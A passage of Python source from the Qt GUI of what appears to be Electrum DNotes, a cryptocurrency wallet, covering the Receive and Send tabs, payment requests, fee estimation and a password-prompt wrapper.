                text += self.fx.get_fiat_status_text(c + u + x,
                    self.base_unit(), self.get_decimal_point()) or ''
            if not self.network.proxy:
                icon = QIcon(":icons/status_connected.png")
            else:
                icon = QIcon(":icons/status_connected_proxy.png")
    else:
        text = _("Not connected")
        icon = QIcon(":icons/status_disconnected.png")
    self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
    self.balance_label.setText(text)
    self.status_button.setIcon( icon )
def update_wallet(self):
    """Refresh the status bar, and the tab lists once synced or offline."""
    self.update_status()
    disconnected = not self.network or not self.network.is_connected()
    if self.wallet.up_to_date or disconnected:
        self.update_tabs()
def update_tabs(self):
    """Redraw every list view and refresh the pay-to completions."""
    for view in (self.history_list, self.request_list, self.address_list,
                 self.utxo_list, self.contact_list, self.invoice_list):
        view.update()
    self.update_completions()
def create_history_tab(self):
    """Build the History tab, restoring the toolbar visibility preference."""
    from .history_list import HistoryList
    hist = HistoryList(self)
    self.history_list = hist
    hist.searchable_list = hist
    toolbar = hist.create_toolbar(self.config)
    hist.show_toolbar(self.config.get('show_toolbar_history', False))
    return self.create_list_tab(hist, toolbar)
def show_address(self, addr):
    """Open the modal address-detail dialog for *addr*."""
    from . import address_dialog
    address_dialog.AddressDialog(self, addr).exec_()
def show_transaction(self, tx, tx_desc = None):
    """Open the transaction-detail dialog.

    tx_desc is set only for txs created in the Send tab.
    """
    show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
    """Build the Receive tab: address/description/amount form, expiry combo,
    save/new buttons, QR preview and the saved-requests list."""
    # A 4-column grid layout. All the stretch is in the last column.
    # The exchange rate plugin adds a fiat widget in column 2
    self.receive_grid = grid = QGridLayout()
    grid.setSpacing(8)
    grid.setColumnStretch(3, 1)
    self.receive_address_e = ButtonsLineEdit()
    self.receive_address_e.addCopyButton(self.app)
    self.receive_address_e.setReadOnly(True)
    msg = _('DNotes address where the payment should be received. Note that each payment request uses a different DNotes address.')
    self.receive_address_label = HelpLabel(_('Receiving address'), msg)
    self.receive_address_e.textChanged.connect(self.update_receive_qr)
    self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
    grid.addWidget(self.receive_address_label, 0, 0)
    grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
    self.receive_message_e = QLineEdit()
    grid.addWidget(QLabel(_('Description')), 1, 0)
    grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
    self.receive_message_e.textChanged.connect(self.update_receive_qr)
    self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
    grid.addWidget(QLabel(_('Requested amount')), 2, 0)
    grid.addWidget(self.receive_amount_e, 2, 1)
    self.receive_amount_e.textChanged.connect(self.update_receive_qr)
    # optional fiat twin of the amount field (hidden when fx is disabled)
    self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
    if not self.fx or not self.fx.is_enabled():
        self.fiat_receive_e.setVisible(False)
    grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
    self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
    self.expires_combo = QComboBox()
    self.expires_combo.addItems([i[0] for i in expiration_values])
    self.expires_combo.setCurrentIndex(3)
    self.expires_combo.setFixedWidth(self.receive_amount_e.width())
    msg = ' '.join([
        _('Expiration date of your request.'),
        _('This information is seen by the recipient if you send them a signed payment request.'),
        _('Expired requests have to be deleted manually from your list, in order to free the corresponding DNotes addresses.'),
        _('The DNotes address never expires and will always be part of this electrum-dnotes wallet.'),
    ])
    grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
    grid.addWidget(self.expires_combo, 3, 1)
    # read-only label shown instead of the combo for saved requests
    self.expires_label = QLineEdit('')
    self.expires_label.setReadOnly(1)
    self.expires_label.setFocusPolicy(Qt.NoFocus)
    self.expires_label.hide()
    grid.addWidget(self.expires_label, 3, 1)
    self.save_request_button = QPushButton(_('Save'))
    self.save_request_button.clicked.connect(self.save_payment_request)
    self.new_request_button = QPushButton(_('New'))
    self.new_request_button.clicked.connect(self.new_payment_request)
    # QR preview; click opens the detached QR window
    self.receive_qr = QRCodeWidget(fixedSize=200)
    self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
    self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
    self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
    self.receive_buttons = buttons = QHBoxLayout()
    buttons.addStretch(1)
    buttons.addWidget(self.save_request_button)
    buttons.addWidget(self.new_request_button)
    grid.addLayout(buttons, 4, 1, 1, 2)
    self.receive_requests_label = QLabel(_('Requests'))
    from .request_list import RequestList
    self.request_list = RequestList(self)
    # layout
    vbox_g = QVBoxLayout()
    vbox_g.addLayout(grid)
    vbox_g.addStretch()
    hbox = QHBoxLayout()
    hbox.addLayout(vbox_g)
    hbox.addWidget(self.receive_qr)
    w = QWidget()
    w.searchable_list = self.request_list
    vbox = QVBoxLayout(w)
    vbox.addLayout(hbox)
    vbox.addStretch(1)
    vbox.addWidget(self.receive_requests_label)
    vbox.addWidget(self.request_list)
    vbox.setStretchFactor(self.request_list, 1000)
    return w
def delete_payment_request(self, addr):
    """Remove the saved request for *addr* and reset the receive form."""
    self.wallet.remove_payment_request(addr, self.config)
    self.request_list.update()
    self.clear_receive_tab()
def get_request_URI(self, addr):
    """Build the payment URI for *addr*, with optional time/exp/signature params."""
    req = self.wallet.receive_requests[addr]
    label = self.wallet.labels.get(addr, '')
    uri = util.create_URI(addr, req['amount'], label)
    created = req.get('time')
    if created:
        uri += "&time=%d" % created
    expiry = req.get('exp')
    if expiry:
        uri += "&exp=%d" % expiry
    if req.get('name') and req.get('sig'):
        # embed the base58-encoded alias signature
        sig58 = bitcoin.base_encode(bfh(req.get('sig')), base=58)
        uri += "&name=" + req['name'] + "&sig=" + sig58
    return str(uri)
def sign_payment_request(self, addr):
    """Sign the payment request for *addr* with the configured alias key.

    Does nothing unless an alias is configured and resolved. When the alias
    address belongs to this wallet, prompts for the password (if the
    keystore is encrypted) and signs; errors are reported via show_error.
    """
    # NOTE: removed unused local 'alias_privkey = None' from the original.
    alias = self.config.get('alias')
    if alias and self.alias_info:
        alias_addr, alias_name, validated = self.alias_info
        if alias_addr:
            if self.wallet.is_mine(alias_addr):
                msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
                password = None
                if self.wallet.has_keystore_encryption():
                    password = self.password_dialog(msg)
                    if not password:
                        # user cancelled the password prompt
                        return
                try:
                    self.wallet.sign_payment_request(addr, alias, alias_addr, password)
                except Exception as e:
                    self.show_error(str(e))
                    return
            else:
                # alias address is not ours - cannot sign
                return
def save_payment_request(self):
    """Persist the request described by the receive-tab fields; sign and refresh on success."""
    addr = str(self.receive_address_e.text())
    amount = self.receive_amount_e.get_amount()
    message = self.receive_message_e.text()
    if not message and not amount:
        self.show_error(_('No message or amount'))
        return False
    expiration = expiration_values[self.expires_combo.currentIndex()][1]
    req = self.wallet.make_payment_request(addr, amount, message, expiration)
    try:
        self.wallet.add_payment_request(req, self.config)
    except Exception as e:
        traceback.print_exc(file=sys.stderr)
        self.show_error(_('Error adding payment request') + ':\n' + str(e))
    else:
        self.sign_payment_request(addr)
        self.save_request_button.setEnabled(False)
    finally:
        # refresh lists whether or not the request was stored
        self.request_list.update()
        self.address_list.update()
def view_and_paste(self, title, msg, data):
    """Modal dialog showing *data* as copyable QR/text."""
    dialog = WindowModalDialog(self, title)
    layout = QVBoxLayout()
    caption = QLabel(msg)
    caption.setWordWrap(True)
    layout.addWidget(caption)
    text_widget = ShowQRTextEdit(text=data)
    layout.addWidget(text_widget)
    layout.addLayout(Buttons(CopyCloseButton(text_widget.text, self.app, dialog)))
    dialog.setLayout(layout)
    dialog.exec_()
def export_payment_request(self, addr):
    """Serialize the request for *addr* as BIP70 and save it to a user-chosen file."""
    req = self.wallet.receive_requests.get(addr)
    payload = paymentrequest.serialize_request(req).SerializeToString()
    suggested_name = req['id'] + '.bip70'
    fileName = self.getSaveFileName(_("Select where to save your payment request"), suggested_name, "*.bip70")
    if not fileName:
        return
    with open(fileName, "wb+") as f:
        f.write(util.to_bytes(payload))
    self.show_message(_("Request saved successfully"))
    self.saved = True
def new_payment_request(self):
    """Load an unused address into the receive form, deriving a new one if needed.

    Non-deterministic wallets cannot derive addresses, so the user is told to
    reuse existing ones; deterministic wallets get a gap-limit warning first.
    """
    addr = self.wallet.get_unused_address()
    if addr is None:
        if not self.wallet.is_deterministic():
            msg = [
                _('No more addresses in your wallet.'),
                _('You are using a non-deterministic wallet, which cannot create new addresses.'),
                _('If you want to create new addresses, use a deterministic wallet instead.')
            ]
            self.show_message(' '.join(msg))
            return
        if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
            return
        addr = self.wallet.create_new_address(False)
    self.set_receive_address(addr)
    self.expires_label.hide()
    self.expires_combo.show()
    self.new_request_button.setEnabled(False)
    self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
    """Load *addr* into the receive form, clearing description and amount."""
    self.receive_address_e.setText(addr)
    self.receive_message_e.setText('')
    self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
    """Reset the receive form to the wallet's current receiving address."""
    addr = self.wallet.get_receiving_address() or ''
    self.receive_address_e.setText(addr)
    self.receive_message_e.setText('')
    self.receive_amount_e.setAmount(None)
    # back to "new request" mode: editable expiry combo
    self.expires_label.hide()
    self.expires_combo.show()
def toggle_qr_window(self):
    """Show or hide the detached QR window, remembering its geometry."""
    from . import qrwindow
    if not self.qr_window:
        # first use: create and show it
        self.qr_window = qrwindow.QR_Window(self)
        self.qr_window.setVisible(True)
        self.qr_window_geometry = self.qr_window.geometry()
    elif self.qr_window.isVisible():
        # hide: stash geometry so we can restore it next time
        self.qr_window_geometry = self.qr_window.geometry()
        self.qr_window.setVisible(False)
    else:
        # re-show at the last remembered position
        self.qr_window.setVisible(True)
        self.qr_window.setGeometry(self.qr_window_geometry)
    self.update_receive_qr()
def show_send_tab(self):
    """Switch the main tab widget to the Send tab."""
    idx = self.tabs.indexOf(self.send_tab)
    self.tabs.setCurrentIndex(idx)
def show_receive_tab(self):
    """Switch the main tab widget to the Receive tab."""
    idx = self.tabs.indexOf(self.receive_tab)
    self.tabs.setCurrentIndex(idx)
def receive_at(self, addr):
    """Jump to the receive tab pre-filled with *addr* (no-op if invalid)."""
    if not bitcoin.is_address(addr):
        return
    self.show_receive_tab()
    self.receive_address_e.setText(addr)
    self.new_request_button.setEnabled(True)
def update_receive_qr(self):
    """Regenerate the payment URI/QR from the current receive-form fields."""
    addr = str(self.receive_address_e.text())
    amount = self.receive_amount_e.get_amount()
    message = self.receive_message_e.text()
    has_content = (amount is not None) or (message != "")
    self.save_request_button.setEnabled(has_content)
    uri = util.create_URI(addr, amount, message)
    self.receive_qr.setData(uri)
    if self.qr_window and self.qr_window.isVisible():
        self.qr_window.set_content(addr, amount, message, uri)
def set_feerounding_text(self, num_satoshis_added):
    """Remember the tooltip text describing the current fee rounding."""
    template = _('Additional {} satoshis are going to be added.')
    self.feerounding_text = template.format(num_satoshis_added)
def create_send_tab(self):
    """Build the Send tab: pay-to/description/invoice/amount form, the
    fee slider plus advanced fee controls, action buttons and the invoice
    list, wiring all the cross-field signal handlers."""
    # A 4-column grid layout. All the stretch is in the last column.
    # The exchange rate plugin adds a fiat widget in column 2
    self.send_grid = grid = QGridLayout()
    grid.setSpacing(8)
    grid.setColumnStretch(3, 1)
    from .paytoedit import PayToEdit
    self.amount_e = BTCAmountEdit(self.get_decimal_point)
    self.invoice_e = MyLineEdit()
    self.payto_e = PayToEdit(self)
    msg = _('Recipient of the funds.') + '\n\n'\
          + _('You may enter a DNotes address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a DNotes address)')
    payto_label = HelpLabel(_('Pay to'), msg)
    grid.addWidget(payto_label, 1, 0)
    grid.addWidget(self.payto_e, 1, 1, 1, -1)
    completer = QCompleter()
    completer.setCaseSensitivity(False)
    self.payto_e.set_completer(completer)
    completer.setModel(self.completions)
    msg = _('Description of the transaction (not mandatory).') + '\n\n'\
          + _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
    description_label = HelpLabel(_('Description'), msg)
    grid.addWidget(description_label, 2, 0)
    self.message_e = MyLineEdit()
    grid.addWidget(self.message_e, 2, 1, 1, -1)
    msg = _('Invoice number (not mandatory).') + '\n\n'\
          + _('The invoice is a user defined identifier that gets stored in the blockchain with the transaction.')
    invoice_label = HelpLabel(_('Invoice'), msg)
    grid.addWidget(invoice_label, 3, 0)
    grid.addWidget(self.invoice_e, 3, 1, 1, -1)
    # "From" list: shown only when the user manually selects coins
    self.from_label = QLabel(_('From'))
    grid.addWidget(self.from_label, 4, 0)
    self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
    self.from_list.setHeaderHidden(True)
    self.from_list.setMaximumHeight(80)
    grid.addWidget(self.from_list, 4, 1, 1, -1)
    self.set_pay_from([])
    msg = _('Amount to be sent.') + '\n\n' \
          + _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
          + _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
          + _('Keyboard shortcut: type "!" to send all your coins.')
    amount_label = HelpLabel(_('Amount'), msg)
    grid.addWidget(amount_label, 5, 0)
    grid.addWidget(self.amount_e, 5, 1)
    self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
    if not self.fx or not self.fx.is_enabled():
        self.fiat_send_e.setVisible(False)
    grid.addWidget(self.fiat_send_e, 5, 2)
    self.amount_e.frozen.connect(
        lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
    self.max_button = EnterButton(_("Max"), self.spend_max)
    self.max_button.setFixedWidth(140)
    grid.addWidget(self.max_button, 5, 3)
    hbox = QHBoxLayout()
    hbox.addStretch(1)
    grid.addLayout(hbox, 5, 4)
    msg = _('DNotes transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
          + _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
          + _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
    self.fee_e_label = HelpLabel(_('Fee'), msg)

    def fee_cb(dyn, pos, fee_rate):
        # slider moved: persist the chosen level/rate and mirror it
        # into the feerate edit, then recompute the fee
        if dyn:
            if self.config.use_mempool_fees():
                self.config.set_key('depth_level', pos, False)
            else:
                self.config.set_key('fee_level', pos, False)
        else:
            self.config.set_key('fee_per_kb', fee_rate, False)
        #TODO: should find out the root cause of why feerate_e can be None here, but for now added this
        if not hasattr(self,'feerate_e'):
            return
        if fee_rate:
            self.feerate_e.setAmount(fee_rate // 1000)
        else:
            self.feerate_e.setAmount(None)
        self.fee_e.setModified(False)
        self.fee_slider.activate()
        self.spend_max() if self.is_max else self.update_fee()

    self.fee_slider = FeeSlider(self, self.config, fee_cb)
    self.fee_slider.setFixedWidth(140)

    def on_fee_or_feerate(edit_changed, editing_finished):
        # manual edit of either the absolute fee or the feerate field
        edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
        if editing_finished:
            if not edit_changed.get_amount():
                # This is so that when the user blanks the fee and moves on,
                # we go back to auto-calculate mode and put a fee back.
                edit_changed.setModified(False)
        else:
            # edit_changed was edited just now, so make sure we will
            # freeze the correct fee setting (this)
            edit_other.setModified(False)
        self.fee_slider.deactivate()
        self.update_fee()

    class TxSizeLabel(QLabel):
        # read-only "x N bytes =" label between feerate and fee
        def setAmount(self, byte_size):
            self.setText(('x %s bytes =' % byte_size) if byte_size else '')

    self.size_e = TxSizeLabel()
    self.size_e.setAlignment(Qt.AlignCenter)
    self.size_e.setAmount(0)
    self.size_e.setFixedWidth(140)
    self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
    self.feerate_e = FeerateEdit(lambda: 0)
    self.feerate_e.setAmount(self.config.fee_per_byte())
    self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
    self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
    self.fee_e = BTCAmountEdit(self.get_decimal_point)
    self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
    self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))

    def feerounding_onclick():
        # explain why the displayed fee may differ from the actual fee
        text = (self.feerounding_text + '\n\n' +
                _('To somewhat protect your privacy, Electrum DNotes tries to create change with similar precision to other outputs.') + ' ' +
                _('At most 100 satoshis might be lost due to this rounding.') + ' ' +
                _("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
                _('Also, dust is not kept as change, but added to the fee.'))
        QMessageBox.information(self, 'Fee rounding', text)

    self.feerounding_icon = QPushButton(QIcon(':icons/info.png'), '')
    self.feerounding_icon.setFixedWidth(20)
    self.feerounding_icon.setFlat(True)
    self.feerounding_icon.clicked.connect(feerounding_onclick)
    self.feerounding_icon.setVisible(False)
    self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
    vbox_feelabel = QVBoxLayout()
    vbox_feelabel.addWidget(self.fee_e_label)
    vbox_feelabel.addStretch(1)
    #grid.addLayout(vbox_feelabel, 6, 0)
    self.fee_adv_controls = QWidget()
    hbox = QHBoxLayout(self.fee_adv_controls)
    hbox.setContentsMargins(0, 0, 0, 0)
    hbox.addWidget(self.feerate_e)
    hbox.addWidget(self.size_e)
    hbox.addWidget(self.fee_e)
    hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
    hbox.addStretch(1)
    vbox_feecontrol = QVBoxLayout()
    vbox_feecontrol.addWidget(self.fee_adv_controls)
    vbox_feecontrol.addWidget(self.fee_slider)
    #grid.addLayout(vbox_feecontrol, 6, 1, 1, -1)
    if not self.config.get('show_fee', False):
        self.fee_adv_controls.setVisible(False)
    self.preview_button = EnterButton(_("Preview"), self.do_preview)
    self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
    self.send_button = EnterButton(_("Send"), self.do_send)
    self.clear_button = EnterButton(_("Clear"), self.do_clear)
    buttons = QHBoxLayout()
    buttons.addStretch(1)
    buttons.addWidget(self.clear_button)
    buttons.addWidget(self.preview_button)
    buttons.addWidget(self.send_button)
    grid.addLayout(buttons, 6, 1, 1, 3)
    self.amount_e.shortcut.connect(self.spend_max)
    self.payto_e.textChanged.connect(self.update_fee)
    self.amount_e.textEdited.connect(self.update_fee)

    def reset_max(t):
        # any manual amount edit cancels "send max" mode
        self.is_max = False
        self.max_button.setEnabled(not bool(t))

    self.amount_e.textEdited.connect(reset_max)
    self.fiat_send_e.textEdited.connect(reset_max)

    def entry_changed():
        # recolor amount/fee/feerate fields: red = not enough funds,
        # blue = auto-filled value, default = user-entered
        text = ""
        amt_color = ColorScheme.DEFAULT
        fee_color = ColorScheme.DEFAULT
        feerate_color = ColorScheme.DEFAULT
        if self.not_enough_funds:
            amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
            feerate_color = ColorScheme.RED
            text = _( "Not enough funds" )
            c, u, x = self.wallet.get_frozen_balance()
            if c+u+x:
                text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
        # blue color denotes auto-filled values
        elif self.fee_e.isModified():
            feerate_color = ColorScheme.BLUE
        elif self.feerate_e.isModified():
            fee_color = ColorScheme.BLUE
        elif self.amount_e.isModified():
            fee_color = ColorScheme.BLUE
            feerate_color = ColorScheme.BLUE
        else:
            amt_color = ColorScheme.BLUE
            fee_color = ColorScheme.BLUE
            feerate_color = ColorScheme.BLUE
        self.statusBar().showMessage(text)
        self.amount_e.setStyleSheet(amt_color.as_stylesheet())
        self.fee_e.setStyleSheet(fee_color.as_stylesheet())
        self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())

    self.amount_e.textChanged.connect(entry_changed)
    self.fee_e.textChanged.connect(entry_changed)
    self.feerate_e.textChanged.connect(entry_changed)
    self.invoices_label = QLabel(_('Invoices'))
    from .invoice_list import InvoiceList
    self.invoice_list = InvoiceList(self)
    vbox0 = QVBoxLayout()
    vbox0.addLayout(grid)
    hbox = QHBoxLayout()
    hbox.addLayout(vbox0)
    w = QWidget()
    vbox = QVBoxLayout(w)
    vbox.addLayout(hbox)
    vbox.addStretch(1)
    vbox.addWidget(self.invoices_label)
    vbox.addWidget(self.invoice_list)
    vbox.setStretchFactor(self.invoice_list, 1000)
    w.searchable_list = self.invoice_list
    run_hook('create_send_tab', grid)
    return w
def spend_max(self):
    """Switch to 'send everything' mode and recompute the fee."""
    self.is_max = True
    self.do_update_fee()
def update_fee(self):
    """Request a fee recomputation on the next GUI timer tick."""
    self.require_fee_update = True
def get_payto_or_dummy(self):
    """Return the pay-to recipient, or a wallet dummy address for fee estimation."""
    recipient = self.payto_e.get_recipient()
    if recipient:
        return recipient
    return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
    '''Recalculate the fee. If the fee was manually input, retain it, but
    still build the TX to see if there are enough funds.
    '''
    freeze_fee = self.is_send_fee_frozen()
    freeze_feerate = self.is_send_feerate_frozen()
    # '!' is the sentinel for "send max" understood by the wallet
    amount = '!' if self.is_max else self.amount_e.get_amount()
    if amount is None:
        if not freeze_fee:
            self.fee_e.setAmount(None)
        self.not_enough_funds = False
        self.statusBar().showMessage('')
    else:
        fee_estimator = self.get_send_fee_estimator()
        outputs = self.payto_e.get_outputs(self.is_max)
        if not outputs:
            _type, addr = self.get_payto_or_dummy()
            outputs = [(_type, addr, amount, '')] #null invoice for now
        is_sweep = bool(self.tx_external_keypairs)
        make_tx = lambda fee_est: \
            self.wallet.make_unsigned_transaction(
                self.get_coins(), outputs, self.config,
                fixed_fee=fee_est, is_sweep=is_sweep)
        try:
            tx = make_tx(fee_estimator)
            self.not_enough_funds = False
        except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
            # could not build a funded tx: blank the auto-filled fields
            if not freeze_fee:
                self.fee_e.setAmount(None)
            if not freeze_feerate:
                self.feerate_e.setAmount(None)
            self.feerounding_icon.setVisible(False)
            if isinstance(e, NotEnoughFunds):
                self.not_enough_funds = True
            elif isinstance(e, NoDynamicFeeEstimates):
                # still try to show the tx size with a zero fee
                try:
                    tx = make_tx(0)
                    size = tx.estimated_size()
                    self.size_e.setAmount(size)
                except BaseException:
                    pass
            return
        except BaseException:
            traceback.print_exc(file=sys.stderr)
            return
        size = tx.estimated_size()
        self.size_e.setAmount(size)
        fee = tx.get_fee()
        fee = None if self.not_enough_funds else fee
        # Displayed fee/fee_rate values are set according to user input.
        # Due to rounding or dropping dust in CoinChooser,
        # actual fees often differ somewhat.
        if freeze_feerate or self.fee_slider.is_active():
            displayed_feerate = self.feerate_e.get_amount()
            if displayed_feerate:
                displayed_feerate = displayed_feerate // 1000
            else:
                # fallback to actual fee
                displayed_feerate = fee // size if fee is not None else None
                self.feerate_e.setAmount(displayed_feerate)
            displayed_fee = displayed_feerate * size if displayed_feerate is not None else None
            self.fee_e.setAmount(displayed_fee)
        else:
            if freeze_fee:
                displayed_fee = self.fee_e.get_amount()
            else:
                # fallback to actual fee if nothing is frozen
                displayed_fee = fee
                self.fee_e.setAmount(displayed_fee)
            displayed_fee = displayed_fee if displayed_fee else 0
            displayed_feerate = displayed_fee // size if displayed_fee is not None else None
            self.feerate_e.setAmount(displayed_feerate)
        # show/hide fee rounding icon
        feerounding = (fee - displayed_fee) if fee else 0
        self.set_feerounding_text(feerounding)
        self.feerounding_icon.setToolTip(self.feerounding_text)
        self.feerounding_icon.setVisible(bool(feerounding))
        if self.is_max:
            amount = tx.output_value()
            self.amount_e.setAmount(amount)
def from_list_delete(self, item):
    """Drop *item* from the manual coin selection and refresh fee/display."""
    idx = self.from_list.indexOfTopLevelItem(item)
    self.pay_from.pop(idx)
    self.redraw_from_list()
    self.update_fee()
def from_list_menu(self, position):
    """Context menu for the 'From' coin list (remove entry)."""
    item = self.from_list.itemAt(position)
    menu = QMenu()
    menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
    global_pos = self.from_list.viewport().mapToGlobal(position)
    menu.exec_(global_pos)
def set_pay_from(self, coins):
    """Replace the manual coin selection with *coins* and redraw the list."""
    self.pay_from = list(coins)
    self.redraw_from_list()
def redraw_from_list(self):
    """Rebuild the 'From' list widget from self.pay_from; hidden when empty."""
    self.from_list.clear()
    empty = len(self.pay_from) == 0
    self.from_label.setHidden(empty)
    self.from_list.setHidden(empty)
    def describe(coin):
        h = coin.get('prevout_hash')
        return h[0:10] + '...' + h[-10:] + ":%d"%coin.get('prevout_n') + u'\t' + "%s"%coin.get('address')
    for coin in self.pay_from:
        row = QTreeWidgetItem([describe(coin), self.format_amount(coin['value'])])
        self.from_list.addTopLevelItem(row)
def get_contact_payto(self, key):
    """Return a pay-to string for contact *key*: 'label <key>' for addresses."""
    _type, label = self.contacts.get(key)
    if _type == 'address':
        return label + ' <' + key + '>'
    return key
def update_completions(self):
    """Refresh the pay-to autocompletion entries from the contact list."""
    entries = [self.get_contact_payto(k) for k in self.contacts.keys()]
    self.completions.setStringList(entries)
def protected(func):
    '''Password request wrapper. The password is passed to the function
    as the 'password' named argument. "None" indicates either an
    unencrypted wallet, or the user cancelled the password request.
    An empty input is passed as the empty string.'''
    def request_password(self, *args, **kwargs):
        parent = self.top_level_window()
        password = None
        # keep prompting until the password verifies or the user cancels
        while self.wallet.has_keystore_encryption():
            password = self.password_dialog(parent=parent)
            if password is None:
                # User cancelled password input
                return
            try:
                self.wallet.check_password(password)
                break
            except Exception as e:
                # wrong password: report and re-prompt
                self.show_error(str(e), parent=parent)
                continue
        kwargs['password'] = password
        return func(self, *args, **kwargs)
    return request_password
def is_send_fee_frozen(self):
    """True when the user manually pinned the absolute fee field."""
    e = self.fee_e
    return e.isVisible() and e.isModified() and (e.text() or e.hasFocus())
def is_send_feerate_frozen(self):
    """True when the user manually pinned the feerate field."""
    e = self.feerate_e
    return e.isVisible() and e.isModified() and (e.text() or e.hasFocus())
def get_send_fee_estimator(self):
    """Return a fixed fee, a feerate-based estimator callable, or None for auto."""
    if self.is_send_fee_frozen():
        return self.fee_e.get_amount()
    if self.is_send_feerate_frozen():
        feerate = self.feerate_e.get_amount()
        if feerate is None:
            feerate = 0
        return partial(
            simple_config.SimpleConfig.estimate_fee_for_feerate, feerate)
    return None
def read_send_tab(self):
    """Collect and validate the Send-tab inputs.

    Returns (outputs, fee_estimator, label, coins), or None after showing
    an error/warning when validation fails or the user aborts.
    """
    if self.payment_request and self.payment_request.has_expired():
        self.show_error(_('Payment request has expired'))
        return
    label = self.message_e.text()
    if self.payment_request:
        # BIP70 request supplies the outputs directly
        outputs = self.payment_request.get_outputs()
    else:
        errors = self.payto_e.get_errors()
        if errors:
            self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
            return
        outputs = self.payto_e.get_outputs(self.is_max)
        if self.payto_e.is_alias and self.payto_e.validated is False:
            # alias resolved but failed DNSSEC validation - ask the user
            alias = self.payto_e.toPlainText()
            msg = _('WARNING: the alias "{}" could not be validated via an additional '
                    'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
            msg += _('Do you wish to continue?')
            if not self.question(msg):
                return
    if not outputs:
        self.show_error(_('No outputs'))
        return
    for _type, addr, amount, invoice in outputs:
        if addr is None:
            self.show_error(_('DNotes Address is None'))
            return
        if _type == TYPE_ADDRESS and not bitcoin.is_address(addr):
            self.show_error(_('Invalid DNotes Address'))
            return
        if amount is None:
            self.show_error(_('Invalid Amount'))
            return
    fee_estimator = self.get_send_fee_estimator()
    coins = self.get_coins()
    return outputs, fee_estimator, label, coins
def do_preview(self):
    """Build the transaction and display it without broadcasting."""
    self.do_send(preview=True)
def do_send(self, preview = False):
    """Build, confirm, sign and (unless *preview*) broadcast the Send-tab tx.

    Validates the form via read_send_tab, checks the relay fee, shows the
    confirmation dialog (with password prompt for encrypted wallets), then
    hands off to sign_tx_with_password.
    """
    if run_hook('abort_send', self):
        return
    r = self.read_send_tab()
    if not r:
        return
    outputs, fee_estimator, tx_desc, coins = r
    try:
        is_sweep = bool(self.tx_external_keypairs)
        tx = self.wallet.make_unsigned_transaction(
            coins, outputs, self.config, fixed_fee=fee_estimator,
            is_sweep=is_sweep)
    except NotEnoughFunds:
        self.show_message(_("Insufficient funds"))
        return
    except BaseException as e:
        # CONSISTENCY FIX: the rest of this file prints tracebacks to
        # stderr; this one went to stdout.
        traceback.print_exc(file=sys.stderr)
        self.show_message(str(e))
        return
    amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
    fee = tx.get_fee()
    use_rbf = self.config.get('use_rbf', True)
    if use_rbf:
        tx.set_rbf(True)
    # refuse transactions below the server relay fee - they would not propagate
    if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
        self.show_error('\n'.join([
            _("This transaction requires a higher fee, or it will not be propagated by your current server"),
            _("Try to raise your transaction fee, or use a server with a lower relay fee.")
        ]))
        return
    if preview:
        self.show_transaction(tx, tx_desc)
        return
    if not self.network:
        self.show_error(_("You can't broadcast a transaction without a live network connection."))
        return
    # confirmation dialog
    msg = [
        _("Amount to be sent") + ": " + self.format_amount_and_units(amount),
        _("Mining fee") + ": " + self.format_amount_and_units(fee),
    ]
    x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
    if x_fee:
        x_fee_address, x_fee_amount = x_fee
        msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
    confirm_rate = simple_config.FEERATE_WARNING_HIGH_FEE
